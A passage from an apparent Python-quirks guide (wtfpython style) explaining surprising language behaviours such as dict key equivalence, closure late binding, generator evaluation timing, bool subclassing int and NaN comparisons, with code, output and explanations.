257 >>> id(x) 140084850247440 >>> id(y) 140084850247344 ``` Here the interpreter isn't smart enough while executing `y = 257` to recognize that we've already created an integer of the value `257,` and so it goes on to create another object in the memory. Similar optimization applies to other **immutable** objects like empty tuples as well. Since lists are mutable, that's why `[] is []` will return `False` and `() is ()` will return `True`. This explains our second snippet. Let's move on to the third one, **Both `a` and `b` refer to the same object when initialized with same value in the same line.** **Output** ```py >>> a, b = 257, 257 >>> id(a) 140640774013296 >>> id(b) 140640774013296 >>> a = 257 >>> b = 257 >>> id(a) 140640774013392 >>> id(b) 140640774013488 ``` * When a and b are set to `257` in the same line, the Python interpreter creates a new object, then references the second variable at the same time. If you do it on separate lines, it doesn't "know" that there's already `257` as an object. * It's a compiler optimization and specifically applies to the interactive environment. When you enter two lines in a live interpreter, they're compiled separately, therefore optimized separately. If you were to try this example in a `.py` file, you would not see the same behavior, because the file is compiled all at once. 
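One way to peek at this (CPython-specific, so treat it as an illustrative sketch rather than guaranteed behavior) is to compile the two statements as a single unit and inspect its constants; the equal `257` literals are folded into one shared constant object:

```py
>>> code = compile("a = 257; b = 257", "<test>", "exec")
>>> code.co_consts   # one shared 257 constant (plus the implicit None return value)
(257, None)
```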
This optimization is not limited to integers, it works for other immutable data types like strings (check the "Strings are tricky example") and floats as well, ```py >>> a, b = 257.0, 257.0 >>> a is b True ``` * Why didn't this work for Python 3.7? The abstract reason is because such compiler optimizations are implementation specific (i.e. may change with version, OS, etc). I'm still figuring out what exact implementation change cause the issue, you can check out this [issue](https://github.com/satwikkansal/wtfpython/issues/100) for updates. --- ### ▶ Hash brownies <!-- Example ID: eb17db53-49fd-4b61-85d6-345c5ca213ff ---> 1\. ```py some_dict = {} some_dict[5.5] = "JavaScript" some_dict[5.0] = "Ruby" some_dict[5] = "Python" ``` **Output:** ```py >>> some_dict[5.5] "JavaScript" >>> some_dict[5.0] # "Python" destroyed the existence of "Ruby"? "Python" >>> some_dict[5] "Python" >>> complex_five = 5 + 0j >>> type(complex_five) complex >>> some_dict[complex_five] "Python" ``` So, why is Python all over the place? #### 💡 Explanation * Uniqueness of keys in a Python dictionary is by *equivalence*, not identity. So even though `5`, `5.0`, and `5 + 0j` are distinct objects of different types, since they're equal, they can't both be in the same `dict` (or `set`). As soon as you insert any one of them, attempting to look up any distinct but equivalent key will succeed with the original mapped value (rather than failing with a `KeyError`): ```py >>> 5 == 5.0 == 5 + 0j True >>> 5 is not 5.0 is not 5 + 0j True >>> some_dict = {} >>> some_dict[5.0] = "Ruby" >>> 5.0 in some_dict True >>> (5 in some_dict) and (5 + 0j in some_dict) True ``` * This applies when setting an item as well. So when you do `some_dict[5] = "Python"`, Python finds the existing item with equivalent key `5.0 -> "Ruby"`, overwrites its value in place, and leaves the original key alone. ```py >>> some_dict {5.0: 'Ruby'} >>> some_dict[5] = "Python" >>> some_dict {5.0: 'Python'} ``` * So how can we update the key to `5` (instead of `5.0`)? We can't actually do this update in place, but what we can do is first delete the key (`del some_dict[5.0]`), and then set it (`some_dict[5]`) to get the integer `5` as the key instead of floating `5.0`, though this should be needed in rare cases. * How did Python find `5` in a dictionary containing `5.0`? Python does this in constant time without having to scan through every item by using hash functions. When Python looks up a key `foo` in a dict, it first computes `hash(foo)` (which runs in constant-time). Since in Python it is required that objects that compare equal also have the same hash value ([docs](https://docs.python.org/3/reference/datamodel.html#object.__hash__) here), `5`, `5.0`, and `5 + 0j` have the same hash value. ```py >>> 5 == 5.0 == 5 + 0j True >>> hash(5) == hash(5.0) == hash(5 + 0j) True ``` **Note:** The inverse is not necessarily true: Objects with equal hash values may themselves be unequal. (This causes what's known as a [hash collision](https://en.wikipedia.org/wiki/Collision_(computer_science)), and degrades the constant-time performance that hashing usually provides.) --- ### ▶ Deep down, we're all the same. 
<!-- Example ID: 8f99a35f-1736-43e2-920d-3b78ec35da9b ---> ```py class WTF: pass ``` **Output:** ```py >>> WTF() == WTF() # two different instances can't be equal False >>> WTF() is WTF() # identities are also different False >>> hash(WTF()) == hash(WTF()) # hashes _should_ be different as well True >>> id(WTF()) == id(WTF()) True ``` #### 💡 Explanation: * When `id` was called, Python created a `WTF` class object and passed it to the `id` function. The `id` function takes its `id` (its memory location), and throws away the object. The object is destroyed. * When we do this twice in succession, Python allocates the same memory location to this second object as well. Since (in CPython) `id` uses the memory location as the object id, the id of the two objects is the same. * So, the object's id is unique only for the lifetime of the object. After the object is destroyed, or before it is created, something else can have the same id. * But why did the `is` operator evaluate to `False`? Let's see with this snippet. ```py class WTF(object): def __init__(self): print("I") def __del__(self): print("D") ``` **Output:** ```py >>> WTF() is WTF() I I D D False >>> id(WTF()) == id(WTF()) I D I D True ``` As you may observe, the order in which the objects are destroyed is what made all the difference here. --- ### ▶ Disorder within order * <!-- Example ID: 91bff1f8-541d-455a-9de4-6cd8ff00ea66 ---> ```py from collections import OrderedDict dictionary = dict() dictionary[1] = 'a'; dictionary[2] = 'b'; ordered_dict = OrderedDict() ordered_dict[1] = 'a'; ordered_dict[2] = 'b'; another_ordered_dict = OrderedDict() another_ordered_dict[2] = 'b'; another_ordered_dict[1] = 'a'; class DictWithHash(dict): """ A dict that also implements __hash__ magic. """ __hash__ = lambda self: 0 class OrderedDictWithHash(OrderedDict): """ An OrderedDict that also implements __hash__ magic. """ __hash__ = lambda self: 0 ``` **Output** ```py >>> dictionary == ordered_dict # If a == b True >>> dictionary == another_ordered_dict # and b == c True >>> ordered_dict == another_ordered_dict # then why isn't c == a ?? False # We all know that a set consists of only unique elements, # let's try making a set of these dictionaries and see what happens... >>> len({dictionary, ordered_dict, another_ordered_dict}) Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: unhashable type: 'dict' # Makes sense since dict don't have __hash__ implemented, let's use # our wrapper classes. >>> dictionary = DictWithHash() >>> dictionary[1] = 'a'; dictionary[2] = 'b'; >>> ordered_dict = OrderedDictWithHash() >>> ordered_dict[1] = 'a'; ordered_dict[2] = 'b'; >>> another_ordered_dict = OrderedDictWithHash() >>> another_ordered_dict[2] = 'b'; another_ordered_dict[1] = 'a'; >>> len({dictionary, ordered_dict, another_ordered_dict}) 1 >>> len({ordered_dict, another_ordered_dict, dictionary}) # changing the order 2 ``` What is going on here? #### 💡 Explanation: - The reason why intransitive equality didn't hold among `dictionary`, `ordered_dict` and `another_ordered_dict` is because of the way `__eq__` method is implemented in `OrderedDict` class. From the [docs](https://docs.python.org/3/library/collections.html#ordereddict-objects) > Equality tests between OrderedDict objects are order-sensitive and are implemented as `list(od1.items())==list(od2.items())`. Equality tests between `OrderedDict` objects and other Mapping objects are order-insensitive like regular dictionaries. 
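Both comparison rules from the quote can be reproduced by hand with the `ordered_dict` and `another_ordered_dict` objects from the snippet above:

```py
>>> list(ordered_dict.items()) == list(another_ordered_dict.items())
False
>>> dict(ordered_dict) == dict(another_ordered_dict)   # plain-dict comparison ignores order
True
```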
- The reason for this equality in behavior is that it allows `OrderedDict` objects to be directly substituted anywhere a regular dictionary is used. - Okay, so why did changing the order affect the length of the generated `set` object? The answer is the lack of intransitive equality only. Since sets are "unordered" collections of unique elements, the order in which elements are inserted shouldn't matter. But in this case, it does matter. Let's break it down a bit, ```py >>> some_set = set() >>> some_set.add(dictionary) # these are the mapping objects from the snippets above >>> ordered_dict in some_set True >>> some_set.add(ordered_dict) >>> len(some_set) 1 >>> another_ordered_dict in some_set True >>> some_set.add(another_ordered_dict) >>> len(some_set) 1 >>> another_set = set() >>> another_set.add(ordered_dict) >>> another_ordered_dict in another_set False >>> another_set.add(another_ordered_dict) >>> len(another_set) 2 >>> dictionary in another_set True >>> another_set.add(another_ordered_dict) >>> len(another_set) 2 ``` So the inconsistency is due to `another_ordered_dict in another_set` being `False` because `ordered_dict` was already present in `another_set` and as observed before, `ordered_dict == another_ordered_dict` is `False`. --- ### ▶ Keep trying... * <!-- Example ID: b4349443-e89f-4d25-a109-82616be9d41a ---> ```py def some_func(): try: return 'from_try' finally: return 'from_finally' def another_func(): for _ in range(3): try: continue finally: print("Finally!") def one_more_func(): # A gotcha! try: for i in range(3): try: 1 / i except ZeroDivisionError: # Let's throw it here and handle it outside for loop raise ZeroDivisionError("A trivial divide by zero error") finally: print("Iteration", i) break except ZeroDivisionError as e: print("Zero division error occurred", e) ``` **Output:** ```py >>> some_func() 'from_finally' >>> another_func() Finally! Finally! Finally! >>> 1 / 0 Traceback (most recent call last): File "<stdin>", line 1, in <module> ZeroDivisionError: division by zero >>> one_more_func() Iteration 0 ``` #### 💡 Explanation: - When a `return`, `break` or `continue` statement is executed in the `try` suite of a "try…finally" statement, the `finally` clause is also executed on the way out. - The return value of a function is determined by the last `return` statement executed. Since the `finally` clause always executes, a `return` statement executed in the `finally` clause will always be the last one executed. - The caveat here is, if the finally clause executes a `return` or `break` statement, the temporarily saved exception is discarded. --- ### ▶ For what? <!-- Example ID: 64a9dccf-5083-4bc9-98aa-8aeecde4f210 ---> ```py some_string = "wtf" some_dict = {} for i, some_dict[i] in enumerate(some_string): i = 10 ``` **Output:** ```py >>> some_dict # An indexed dict appears. {0: 'w', 1: 't', 2: 'f'} ``` #### 💡 Explanation: * A `for` statement is defined in the [Python grammar](https://docs.python.org/3/reference/grammar.html) as: ``` for_stmt: 'for' exprlist 'in' testlist ':' suite ['else' ':' suite] ``` Where `exprlist` is the assignment target. This means that the equivalent of `{exprlist} = {next_value}` is **executed for each item** in the iterable. An interesting example that illustrates this: ```py for i in range(4): print(i) i = 10 ``` **Output:** ``` 0 1 2 3 ``` Did you expect the loop to run just once? **💡 Explanation:** - The assignment statement `i = 10` never affects the iterations of the loop because of the way for loops work in Python. 
Before the beginning of every iteration, the next item provided by the iterator (`range(4)` in this case) is unpacked and assigned the target list variables (`i` in this case). * The `enumerate(some_string)` function yields a new value `i` (a counter going up) and a character from the `some_string` in each iteration. It then sets the (just assigned) `i` key of the dictionary `some_dict` to that character. The unrolling of the loop can be simplified as: ```py >>> i, some_dict[i] = (0, 'w') >>> i, some_dict[i] = (1, 't') >>> i, some_dict[i] = (2, 'f') >>> some_dict ``` --- ### ▶ Evaluation time discrepancy <!-- Example ID: 6aa11a4b-4cf1-467a-b43a-810731517e98 ---> 1\. ```py array = [1, 8, 15] # A typical generator expression gen = (x for x in array if array.count(x) > 0) array = [2, 8, 22] ``` **Output:** ```py >>> print(list(gen)) # Where did the other values go? [8] ``` 2\. ```py array_1 = [1,2,3,4] gen_1 = (x for x in array_1) array_1 = [1,2,3,4,5] array_2 = [1,2,3,4] gen_2 = (x for x in array_2) array_2[:] = [1,2,3,4,5] ``` **Output:** ```py >>> print(list(gen_1)) [1, 2, 3, 4] >>> print(list(gen_2)) [1, 2, 3, 4, 5] ``` 3\. ```py array_3 = [1, 2, 3] array_4 = [10, 20, 30] gen = (i + j for i in array_3 for j in array_4) array_3 = [4, 5, 6] array_4 = [400, 500, 600] ``` **Output:** ```py >>> print(list(gen)) [401, 501, 601, 402, 502, 602, 403, 503, 603] ``` #### 💡 Explanation - In a [generator](https://wiki.python.org/moin/Generators) expression, the `in` clause is evaluated at declaration time, but the conditional clause is evaluated at runtime. - So before runtime, `array` is re-assigned to the list `[2, 8, 22]`, and since out of `1`, `8` and `15`, only the count of `8` is greater than `0`, the generator only yields `8`. - The differences in the output of `g1` and `g2` in the second part is due the way variables `array_1` and `array_2` are re-assigned values. - In the first case, `array_1` is bound to the new object `[1,2,3,4,5]` and since the `in` clause is evaluated at the declaration time it still refers to the old object `[1,2,3,4]` (which is not destroyed). - In the second case, the slice assignment to `array_2` updates the same old object `[1,2,3,4]` to `[1,2,3,4,5]`. Hence both the `g2` and `array_2` still have reference to the same object (which has now been updated to `[1,2,3,4,5]`). - Okay, going by the logic discussed so far, shouldn't be the value of `list(gen)` in the third snippet be `[11, 21, 31, 12, 22, 32, 13, 23, 33]`? (because `array_3` and `array_4` are going to behave just like `array_1`). The reason why (only) `array_4` values got updated is explained in [PEP-289](https://www.python.org/dev/peps/pep-0289/#the-details) > Only the outermost for-expression is evaluated immediately, the other expressions are deferred until the generator is run. --- ### ▶ `is not ...` is not `is (not ...)` <!-- Example ID: b26fb1ed-0c7d-4b9c-8c6d-94a58a055c0d ---> ```py >>> 'something' is not None True >>> 'something' is (not None) False ``` #### 💡 Explanation - `is not` is a single binary operator, and has behavior different than using `is` and `not` separated. - `is not` evaluates to `False` if the variables on either side of the operator point to the same object and `True` otherwise. - In the example, `(not None)` evaluates to `True` since the value `None` is `False` in a boolean context, so the expression becomes `'something' is True`. --- ### ▶ A tic-tac-toe where X wins in the first attempt! 
<!-- Example ID: 69329249-bdcb-424f-bd09-cca2e6705a7a ---> ```py # Let's initialize a row row = [""] * 3 #row i['', '', ''] # Let's make a board board = [row] * 3 ``` **Output:** ```py >>> board [['', '', ''], ['', '', ''], ['', '', '']] >>> board[0] ['', '', ''] >>> board[0][0] '' >>> board[0][0] = "X" >>> board [['X', '', ''], ['X', '', ''], ['X', '', '']] ``` We didn't assign three `"X"`s, did we? #### 💡 Explanation: When we initialize `row` variable, this visualization explains what happens in the memory ![image](/images/tic-tac-toe/after_row_initialized.png) And when the `board` is initialized by multiplying the `row`, this is what happens inside the memory (each of the elements `board[0]`, `board[1]` and `board[2]` is a reference to the same list referred by `row`) ![image](/images/tic-tac-toe/after_board_initialized.png) We can avoid this scenario here by not using `row` variable to generate `board`. (Asked in [this](https://github.com/satwikkansal/wtfpython/issues/68) issue). ```py >>> board = [['']*3 for _ in range(3)] >>> board[0][0] = "X" >>> board [['X', '', ''], ['', '', ''], ['', '', '']] ``` --- ### ▶ Schrödinger's variable * <!-- Example ID: 4dc42f77-94cb-4eb5-a120-8203d3ed7604 ---> ```py funcs = [] results = [] for x in range(7): def some_func(): return x funcs.append(some_func) results.append(some_func()) # note the function call here funcs_results = [func() for func in funcs] ``` **Output (Python version):** ```py >>> results [0, 1, 2, 3, 4, 5, 6] >>> funcs_results [6, 6, 6, 6, 6, 6, 6] ``` The values of `x` were different in every iteration prior to appending `some_func` to `funcs`, but all the functions return 6 when they're evaluated after the loop completes. 2. ```py >>> powers_of_x = [lambda x: x**i for i in range(10)] >>> [f(2) for f in powers_of_x] [512, 512, 512, 512, 512, 512, 512, 512, 512, 512] ``` #### 💡 Explanation: * When defining a function inside a loop that uses the loop variable in its body, the loop function's closure is bound to the *variable*, not its *value*. The function looks up `x` in the surrounding context, rather than using the value of `x` at the time the function is created. So all of the functions use the latest value assigned to the variable for computation. We can see that it's using the `x` from the surrounding context (i.e. *not* a local variable) with: ```py >>> import inspect >>> inspect.getclosurevars(funcs[0]) ClosureVars(nonlocals={}, globals={'x': 6}, builtins={}, unbound=set()) ``` Since `x` is a global value, we can change the value that the `funcs` will lookup and return by updating `x`: ```py >>> x = 42 >>> [func() for func in funcs] [42, 42, 42, 42, 42, 42, 42] ``` * To get the desired behavior you can pass in the loop variable as a named variable to the function. **Why does this work?** Because this will define the variable *inside* the function's scope. It will no longer go to the surrounding (global) scope to look up the variables value but will create a local variable that stores the value of `x` at that point in time. ```py funcs = [] for x in range(7): def some_func(x=x): return x funcs.append(some_func) ``` **Output:** ```py >>> funcs_results = [func() for func in funcs] >>> funcs_results [0, 1, 2, 3, 4, 5, 6] ``` It is not longer using the `x` in the global scope: ```py >>> inspect.getclosurevars(funcs[0]) ClosureVars(nonlocals={}, globals={}, builtins={}, unbound=set()) ``` --- ### ▶ The chicken-egg problem * <!-- Example ID: 60730dc2-0d79-4416-8568-2a63323b3ce8 ---> 1\. 
```py >>> isinstance(3, int) True >>> isinstance(type, object) True >>> isinstance(object, type) True ``` So which is the "ultimate" base class? There's more to the confusion by the way, 2\. ```py >>> class A: pass >>> isinstance(A, A) False >>> isinstance(type, type) True >>> isinstance(object, object) True ``` 3\. ```py >>> issubclass(int, object) True >>> issubclass(type, object) True >>> issubclass(object, type) False ``` #### 💡 Explanation - `type` is a [metaclass](https://realpython.com/python-metaclasses/) in Python. - **Everything** is an `object` in Python, which includes classes as well as their objects (instances). - class `type` is the metaclass of class `object`, and every class (including `type`) has inherited directly or indirectly from `object`. - There is no real base class among `object` and `type`. The confusion in the above snippets is arising because we're thinking about these relationships (`issubclass` and `isinstance`) in terms of Python classes. The relationship between `object` and `type` can't be reproduced in pure python. To be more precise the following relationships can't be reproduced in pure Python, + class A is an instance of class B, and class B is an instance of class A. + class A is an instance of itself. - These relationships between `object` and `type` (both being instances of each other as well as themselves) exist in Python because of "cheating" at the implementation level. --- ### ▶ Subclass relationships <!-- Example ID: 9f6d8cf0-e1b5-42d0-84a0-4cfab25a0bc0 ---> **Output:** ```py >>> from collections.abc import Hashable >>> issubclass(list, object) True >>> issubclass(object, Hashable) True >>> issubclass(list, Hashable) False ``` The Subclass relationships were expected to be transitive, right? (i.e., if `A` is a subclass of `B`, and `B` is a subclass of `C`, the `A` _should_ a subclass of `C`) #### 💡 Explanation: * Subclass relationships are not necessarily transitive in Python. Anyone is allowed to define their own, arbitrary `__subclasscheck__` in a metaclass. * When `issubclass(cls, Hashable)` is called, it simply looks for non-Falsey "`__hash__`" method in `cls` or anything it inherits from. * Since `object` is hashable, but `list` is non-hashable, it breaks the transitivity relation. * More detailed explanation can be found [here](https://www.naftaliharris.com/blog/python-subclass-intransitivity/). --- ### ▶ Methods equality and identity <!-- Example ID: 94802911-48fe-4242-defa-728ae893fa32 ---> 1. ```py class SomeClass: def method(self): pass @classmethod def classm(cls): pass @staticmethod def staticm(): pass ``` **Output:** ```py >>> print(SomeClass.method is SomeClass.method) True >>> print(SomeClass.classm is SomeClass.classm) False >>> print(SomeClass.classm == SomeClass.classm) True >>> print(SomeClass.staticm is SomeClass.staticm) True ``` Accessing `classm` twice, we get an equal object, but not the *same* one? Let's see what happens with instances of `SomeClass`: 2. ```py o1 = SomeClass() o2 = SomeClass() ``` **Output:** ```py >>> print(o1.method == o2.method) False >>> print(o1.method == o1.method) True >>> print(o1.method is o1.method) False >>> print(o1.classm is o1.classm) False >>> print(o1.classm == o1.classm == o2.classm == SomeClass.classm) True >>> print(o1.staticm is o1.staticm is o2.staticm is SomeClass.staticm) True ``` Accessing `classm` or `method` twice, creates equal but not *same* objects for the same instance of `SomeClass`. 
#### 💡 Explanation * Functions are [descriptors](https://docs.python.org/3/howto/descriptor.html). Whenever a function is accessed as an attribute, the descriptor is invoked, creating a method object which "binds" the function with the object owning the attribute. If called, the method calls the function, implicitly passing the bound object as the first argument (this is how we get `self` as the first argument, despite not passing it explicitly). ```py >>> o1.method <bound method SomeClass.method of <__main__.SomeClass object at ...>> ``` * Accessing the attribute multiple times creates a method object every time! Therefore `o1.method is o1.method` is never truthy. Accessing functions as class attributes (as opposed to instance) does not create methods, however; so `SomeClass.method is SomeClass.method` is truthy. ```py >>> SomeClass.method <function SomeClass.method at ...> ``` * `classmethod` transforms functions into class methods. Class methods are descriptors that, when accessed, create a method object which binds the *class* (type) of the object, instead of the object itself. ```py >>> o1.classm <bound method SomeClass.classm of <class '__main__.SomeClass'>> ``` * Unlike functions, `classmethod`s will create a method also when accessed as class attributes (in which case they bind the class, not to the type of it). So `SomeClass.classm is SomeClass.classm` is falsy. ```py >>> SomeClass.classm <bound method SomeClass.classm of <class '__main__.SomeClass'>> ``` * A method object compares equal when both the functions are equal, and the bound objects are the same. So `o1.method == o1.method` is truthy, although not the same object in memory. * `staticmethod` transforms functions into a "no-op" descriptor, which returns the function as-is. No method objects are ever created, so comparison with `is` is truthy. ```py >>> o1.staticm <function SomeClass.staticm at ...> >>> SomeClass.staticm <function SomeClass.staticm at ...> ``` * Having to create new "method" objects every time Python calls instance methods and having to modify the arguments every time in order to insert `self` affected performance badly. CPython 3.7 [solved it](https://bugs.python.org/issue26110) by introducing new opcodes that deal with calling methods without creating the temporary method objects. This is used only when the accessed function is actually called, so the snippets here are not affected, and still generate methods :) ### ▶ All-true-ation * <!-- Example ID: dfe6d845-e452-48fe-a2da-0ed3869a8042 --> ```py >>> all([True, True, True]) True >>> all([True, True, False]) False >>> all([]) True >>> all([[]]) False >>> all([[[]]]) True ``` Why's this True-False alteration? #### 💡 Explanation: - The implementation of `all` function is equivalent to - ```py def all(iterable): for element in iterable: if not element: return False return True ``` - `all([])` returns `True` since the iterable is empty. - `all([[]])` returns `False` because the passed array has one element, `[]`, and in python, an empty list is falsy. - `all([[[]]])` and higher recursive variants are always `True`. This is because the passed array's single element (`[[...]]`) is no longer empty, and lists with values are truthy. --- ### ▶ The surprising comma <!-- Example ID: 31a819c8-ed73-4dcc-84eb-91bedbb51e58 ---> **Output (< 3.6):** ```py >>> def f(x, y,): ... print(x, y) ... >>> def g(x=4, y=5,): ... print(x, y) ... 
>>> def h(x, **kwargs,):
  File "<stdin>", line 1
    def h(x, **kwargs,):
                     ^
SyntaxError: invalid syntax

>>> def h(*args,):
  File "<stdin>", line 1
    def h(*args,):
                ^
SyntaxError: invalid syntax
```

#### 💡 Explanation:

- A trailing comma is not always legal in the formal parameter list of a Python function.
- In Python, the argument list is defined partially with leading commas and partially with trailing commas. This conflict causes situations where a comma is trapped in the middle, and no rule accepts it.
- **Note:** The trailing comma problem is [fixed in Python 3.6](https://bugs.python.org/issue9232). The remarks in [this](https://bugs.python.org/issue9232#msg248399) post briefly discuss the different usages of trailing commas in Python.

---

### ▶ Strings and the backslashes
<!-- Example ID: 6ae622c3-6d99-4041-9b33-507bd1a4407b --->
**Output:**
```py
>>> print("\"")
"
>>> print(r"\"")
\"
>>> print(r"\")
  File "<stdin>", line 1
    print(r"\")
              ^
SyntaxError: EOL while scanning string literal

>>> r'\'' == "\\'"
True
```

#### 💡 Explanation

- In a usual python string, the backslash is used to escape characters that may have a special meaning (like single-quote, double-quote, and the backslash itself).

    ```py
    >>> "wt\"f"
    'wt"f'
    ```

- In a raw string literal (as indicated by the prefix `r`), backslashes are passed through as-is, but a backslash still "escapes" the character that follows it, so both characters end up in the string.

    ```py
    >>> r'wt\"f' == 'wt\\"f'
    True
    >>> print(repr(r'wt\"f'))
    'wt\\"f'

    >>> print("\n")


    >>> print(r"\\n")
    \\n
    ```

- This means that when the parser encounters a backslash in a raw string, it expects another character to follow it. In our case (`print(r"\")`), the backslash escaped the trailing quote, leaving the parser without a terminating quote (hence the `SyntaxError`). That's why backslashes don't work at the end of a raw string.

---

### ▶ not knot!

<!-- Example ID: 7034deb1-7443-417d-94ee-29a800524de8 --->
```py
x = True
y = False
```

**Output:**
```py
>>> not x == y
True
>>> x == not y
  File "<input>", line 1
    x == not y
         ^
SyntaxError: invalid syntax
```

#### 💡 Explanation:

* Operator precedence affects how an expression is evaluated, and the `==` operator has higher precedence than the `not` operator in Python.
* So `not x == y` is equivalent to `not (x == y)`, which is equivalent to `not (True == False)`, finally evaluating to `True`.
* But `x == not y` raises a `SyntaxError` because it can be thought of as being equivalent to `(x == not) y`, and not the `x == (not y)` you might have expected at first sight.
* The parser expected the `not` token to be a part of the `not in` operator (because both `==` and `not in` operators have the same precedence), but after not being able to find an `in` token following the `not` token, it raises a `SyntaxError`.
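* A quick REPL sketch (not part of the original snippet) showing how explicit parentheses, or the actual `not in` operator, sidestep the ambiguity:

    ```py
    >>> x, y = True, False
    >>> x == (not y)    # parenthesize to get the comparison you meant
    True
    >>> not x == y      # same as not (x == y)
    True
    >>> x not in [y]    # the `not in` operator the parser was hoping to find
    True
    ```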
--- ### ▶ Half triple-quoted strings <!-- Example ID: c55da3e2-1034-43b9-abeb-a7a970a2ad9e ---> **Output:** ```py >>> print('wtfpython''') wtfpython >>> print("wtfpython""") wtfpython >>> # The following statements raise `SyntaxError` >>> # print('''wtfpython') >>> # print("""wtfpython") File "<input>", line 3 print("""wtfpython") ^ SyntaxError: EOF while scanning triple-quoted string literal ``` #### 💡 Explanation: + Python supports implicit [string literal concatenation](https://docs.python.org/3/reference/lexical_analysis.html#string-literal-concatenation), Example, ``` >>> print("wtf" "python") wtfpython >>> print("wtf" "") # or "wtf""" wtf ``` + `'''` and `"""` are also string delimiters in Python which causes a SyntaxError because the Python interpreter was expecting a terminating triple quote as delimiter while scanning the currently encountered triple quoted string literal. --- ### ▶ What's wrong with booleans? <!-- Example ID: 0bba5fa7-9e6d-4cd2-8b94-952d061af5dd ---> 1\. ```py # A simple example to count the number of booleans and # integers in an iterable of mixed data types. mixed_list = [False, 1.0, "some_string", 3, True, [], False] integers_found_so_far = 0 booleans_found_so_far = 0 for item in mixed_list: if isinstance(item, int): integers_found_so_far += 1 elif isinstance(item, bool): booleans_found_so_far += 1 ``` **Output:** ```py >>> integers_found_so_far 4 >>> booleans_found_so_far 0 ``` 2\. ```py >>> some_bool = True >>> "wtf" * some_bool 'wtf' >>> some_bool = False >>> "wtf" * some_bool '' ``` 3\. ```py def tell_truth(): True = False if True == False: print("I have lost faith in truth!") ``` **Output (< 3.x):** ```py >>> tell_truth() I have lost faith in truth! ``` #### 💡 Explanation: * `bool` is a subclass of `int` in Python ```py >>> issubclass(bool, int) True >>> issubclass(int, bool) False ``` * And thus, `True` and `False` are instances of `int` ```py >>> isinstance(True, int) True >>> isinstance(False, int) True ``` * The integer value of `True` is `1` and that of `False` is `0`. ```py >>> int(True) 1 >>> int(False) 0 ``` * See this StackOverflow [answer](https://stackoverflow.com/a/8169049/4354153) for the rationale behind it. * Initially, Python used to have no `bool` type (people used 0 for false and non-zero value like 1 for true). `True`, `False`, and a `bool` type was added in 2.x versions, but, for backward compatibility, `True` and `False` couldn't be made constants. They just were built-in variables, and it was possible to reassign them * Python 3 was backward-incompatible, the issue was finally fixed, and thus the last snippet won't work with Python 3.x! --- ### ▶ Class attributes and instance attributes <!-- Example ID: 6f332208-33bd-482d-8106-42863b739ed9 ---> 1\. ```py class A: x = 1 class B(A): pass class C(A): pass ``` **Output:** ```py >>> A.x, B.x, C.x (1, 1, 1) >>> B.x = 2 >>> A.x, B.x, C.x (1, 2, 1) >>> A.x = 3 >>> A.x, B.x, C.x # C.x changed, but B.x didn't (3, 2, 3) >>> a = A() >>> a.x, A.x (3, 3) >>> a.x += 1 >>> a.x, A.x (4, 3) ``` 2\. 
```py class SomeClass: some_var = 15 some_list = [5] another_list = [5] def __init__(self, x): self.some_var = x + 1 self.some_list = self.some_list + [x] self.another_list += [x] ``` **Output:** ```py >>> some_obj = SomeClass(420) >>> some_obj.some_list [5, 420] >>> some_obj.another_list [5, 420] >>> another_obj = SomeClass(111) >>> another_obj.some_list [5, 111] >>> another_obj.another_list [5, 420, 111] >>> another_obj.another_list is SomeClass.another_list True >>> another_obj.another_list is some_obj.another_list True ``` #### 💡 Explanation: * Class variables and variables in class instances are internally handled as dictionaries of a class object. If a variable name is not found in the dictionary of the current class, the parent classes are searched for it. * The `+=` operator modifies the mutable object in-place without creating a new object. So changing the attribute of one instance affects the other instances and the class attribute as well. --- ### ▶ yielding None <!-- Example ID: 5a40c241-2c30-40d0-8ba9-cf7e097b3b53 ---> ```py some_iterable = ('a', 'b') def some_func(val): return "something" ``` **Output (<= 3.7.x):** ```py >>> [x for x in some_iterable] ['a', 'b'] >>> [(yield x) for x in some_iterable] <generator object <listcomp> at 0x7f70b0a4ad58> >>> list([(yield x) for x in some_iterable]) ['a', 'b'] >>> list((yield x) for x in some_iterable) ['a', None, 'b', None] >>> list(some_func((yield x)) for x in some_iterable) ['a', 'something', 'b', 'something'] ``` #### 💡 Explanation: - This is a bug in CPython's handling of `yield` in generators and comprehensions. - Source and explanation can be found here: https://stackoverflow.com/questions/32139885/yield-in-list-comprehensions-and-generator-expressions - Related bug report: https://bugs.python.org/issue10544 - Python 3.8+ no longer allows `yield` inside list comprehension and will throw a `SyntaxError`. --- ### ▶ Yielding from... return! * <!-- Example ID: 5626d8ef-8802-49c2-adbc-7cda5c550816 ---> 1\. ```py def some_func(x): if x == 3: return ["wtf"] else: yield from range(x) ``` **Output (> 3.3):** ```py >>> list(some_func(3)) [] ``` Where did the `"wtf"` go? Is it due to some special effect of `yield from`? Let's validate that, 2\. ```py def some_func(x): if x == 3: return ["wtf"] else: for i in range(x): yield i ``` **Output:** ```py >>> list(some_func(3)) [] ``` The same result, this didn't work either. #### 💡 Explanation: + From Python 3.3 onwards, it became possible to use `return` statement with values inside generators (See [PEP380](https://www.python.org/dev/peps/pep-0380/)). The [official docs](https://www.python.org/dev/peps/pep-0380/#enhancements-to-stopiteration) say that, > "... `return expr` in a generator causes `StopIteration(expr)` to be raised upon exit from the generator." + In the case of `some_func(3)`, `StopIteration` is raised at the beginning because of `return` statement. The `StopIteration` exception is automatically caught inside the `list(...)` wrapper and the `for` loop. Therefore, the above two snippets result in an empty list. + To get `["wtf"]` from the generator `some_func` we need to catch the `StopIteration` exception, ```py try: next(some_func(3)) except StopIteration as e: some_string = e.value ``` ```py >>> some_string ["wtf"] ``` --- ### ▶ Nan-reflexivity * <!-- Example ID: 59bee91a-36e0-47a4-8c7d-aa89bf1d3976 ---> 1\. 
```py a = float('inf') b = float('nan') c = float('-iNf') # These strings are case-insensitive d = float('nan') ``` **Output:** ```py >>> a inf >>> b nan >>> c -inf >>> float('some_other_string') ValueError: could not convert string to float: some_other_string >>> a == -c # inf==inf True >>> None == None # None == None True >>> b == d # but nan!=nan False >>> 50 / a 0.0 >>> a / a nan >>> 23 + b nan ``` 2\. ```py >>> x = float('nan') >>> y = x / x >>> y is y # identity holds True >>> y == y # equality fails of y False >>> [y] == [y] # but the equality succeeds for the list containing y True ``` #### 💡 Explanation: - `'inf'` and `'nan'` are special strings (case-insensitive), which, when explicitly typecast-ed to `float` type, are used to represent mathematical "infinity" and "not a number" respectively. - Since according to IEEE standards ` NaN != NaN`, obeying this rule breaks the reflexivity assumption of a collection element in Python i.e. if `x` is a part of a collection like `list`, the implementations like comparison are based on the assumption that `x == x`. Because of this assumption, the identity is compared first (since it's faster) while comparing two elements, and the values are compared only when the identities mismatch. The following 